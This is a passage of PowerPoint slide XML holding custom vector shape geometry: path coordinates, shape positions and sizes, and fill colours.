                    <a:pt x="9614" y="108451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35161" y="108451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594801" y="10515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594112" y="5920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603275" y="5920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602388" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="78392" y="565961"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73826" y="566748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79079" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78510" y="566748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78392" y="565961"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="662923" y="465147"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78392" y="565961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79079" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105039" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673201" y="472539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672747" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663577" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662923" y="465147"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="667302" y="464391"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="662923" y="465147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663577" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667302" y="464391"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="671980" y="464391"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="667302" y="464391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663577" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672747" y="469509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672093" y="465147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671980" y="464391"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="603275" y="5920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="594112" y="5920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599388" y="9713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594801" y="10515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662810" y="464391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662923" y="465147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667302" y="464391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671980" y="464391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603275" y="5920"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="9614" y="108451"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5918" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10269" y="112807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9614" y="108451"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="10269" y="112807"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5918" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10384" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10269" y="112807"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="35161" y="108451"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9614" y="108451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10269" y="112807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35161" y="108451"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="594112" y="5920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="594681" y="9713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594801" y="10515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599388" y="9713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594112" y="592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8E6C380B-5DFF-C587-E2C0-594061820DEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6430544" y="2125132"/>
              <a:ext cx="542290" cy="454659"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="542290" h="454660">
                  <a:moveTo>
                    <a:pt x="489271" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="82783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54363" y="454558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542124" y="367258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489271" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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AAE7374A-E4C7-1619-066A-00CEC652D2E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1115" y="2531526"/>
              <a:ext cx="880386" cy="237815"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A8E0F058-0AD0-49D0-3DC7-61CF174B29D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6441848" y="2527070"/>
              <a:ext cx="592455" cy="111760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="592454" h="111760">
                  <a:moveTo>
                    <a:pt x="590439" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554" y="111255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592010" y="8910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59043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3C3A5177-FD07-5DD1-B58E-AAB6AC35FF03}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524167" y="2548089"/>
              <a:ext cx="561975" cy="139065"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="158559" y="124929"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114769" y="100850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93560" y="105333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49834" y="79768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43789" y="115900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64985" y="111417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108724" y="138468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158559" y="124929"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="170637" y="91808"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128358" y="66230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80035" y="81280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120802" y="102349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170637" y="91808"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="249161" y="75260"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="205371" y="52679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155536" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199326" y="88798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249161" y="75260"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="327685" y="60210"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="283895" y="40640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234061" y="49669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277850" y="76758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327685" y="60210"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="404698" y="52679"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="357886" y="27089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308051" y="36118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353364" y="63220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404698" y="52679"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="481711" y="39128"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436410" y="13550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388086" y="28600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433400" y="49669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481711" y="39128"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="561746" y="22580"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="514934" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465112" y="12039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510413" y="36118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561746" y="22580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ABF6F392-1292-8EDB-D178-CFB46EF418F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6585118" y="2647338"/>
              <a:ext cx="101600" cy="41275"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="54061" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="11429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47537" y="40841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58214" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48584" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47376" y="37765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48019" y="37590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9239" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4308" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4689" y="11429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4792" y="10847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17322" y="10847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53588" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53094" y="2907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59348" y="2907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54061" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="48019" y="37590"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47376" y="37765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48584" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48019" y="37590"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="93621" y="25194"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="48019" y="37590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48584" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58214" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98498" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96887" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93621" y="25194"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="97209" y="24219"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93621" y="25194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96887" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96985" y="26147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97096" y="25194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97209" y="24219"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="98092" y="24219"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97209" y="24219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97096" y="25194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96985" y="26147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96887" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98498" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101599" y="26147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98092" y="24219"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="53094" y="2907"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93621" y="25194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97209" y="24219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98092" y="24219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59841" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54934" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53094" y="2907"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="4792" y="10847"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4308" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7983" y="12821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4792" y="10847"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="7983" y="12821"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4308" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9239" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7983" y="12821"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="17322" y="10847"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4792" y="10847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7983" y="12821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17322" y="10847"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="59348" y="2907"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="53094" y="2907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54934" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59841" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59348" y="290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5221CBA1-8EE7-36C4-E248-040E576C1F8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667629" y="2636887"/>
              <a:ext cx="93980" cy="38100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="93979" h="38100">
                  <a:moveTo>
                    <a:pt x="48323" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="10536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42282" y="37628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93625" y="27092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48323" y="0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A3665543-2376-9881-E1F7-40ED3225B11F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6663743" y="2635289"/>
              <a:ext cx="102235" cy="41275"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="52470" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="11437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45866" y="40823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59826" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46994" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45866" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46668" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8983" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4208" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4606" y="11437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4711" y="10867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16762" y="10867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51941" y="3197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51423" y="2887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57300" y="2887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52470" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="93407" y="27995"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45866" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46994" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46668" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60844" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98723" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93407" y="27995"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="60844" y="37751"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46668" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46994" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59826" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60844" y="37751"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="97209" y="27215"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93407" y="27995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97209" y="27215"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="97987" y="27215"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97209" y="27215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96830" y="29386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98723" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101619" y="29386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97987" y="27215"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="57300" y="2887"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="51423" y="2887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52531" y="3068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51941" y="3197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93407" y="27995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97209" y="27215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97987" y="27215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57300" y="2887"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="4711" y="10867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4208" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7771" y="12827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4711" y="10867"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="7771" y="12827"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4208" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8983" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7771" y="12827"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="16762" y="10867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4711" y="10867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7771" y="12827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16762" y="10867"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="51423" y="2887"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="51941" y="3197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52531" y="3068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51423" y="288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16D13ACA-A64B-3C6A-5BA1-790EAB23E140}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6744644" y="2623340"/>
              <a:ext cx="93980" cy="39370"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="93979" h="39369">
                  <a:moveTo>
                    <a:pt x="49833" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="13546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43792" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93625" y="25587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49833" y="0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28D8E550-DC63-22E0-C9D1-D5A0E5659EDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6740778" y="2621721"/>
              <a:ext cx="101600" cy="42545"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="53920" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="14654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47437" y="42373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58172" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48423" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47255" y="39300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47872" y="39133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9339" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4527" y="14654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4630" y="13867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14390" y="13867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53485" y="3240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52933" y="2918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58914" y="2918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53920" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="47872" y="39133"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47255" y="39300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48423" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47872" y="39133"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="93627" y="26695"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47872" y="39133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48423" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58172" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98456" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93627" y="26695"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="97089" y="25754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93627" y="26695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96965" y="26695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97089" y="25754"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="97998" y="25754"/>
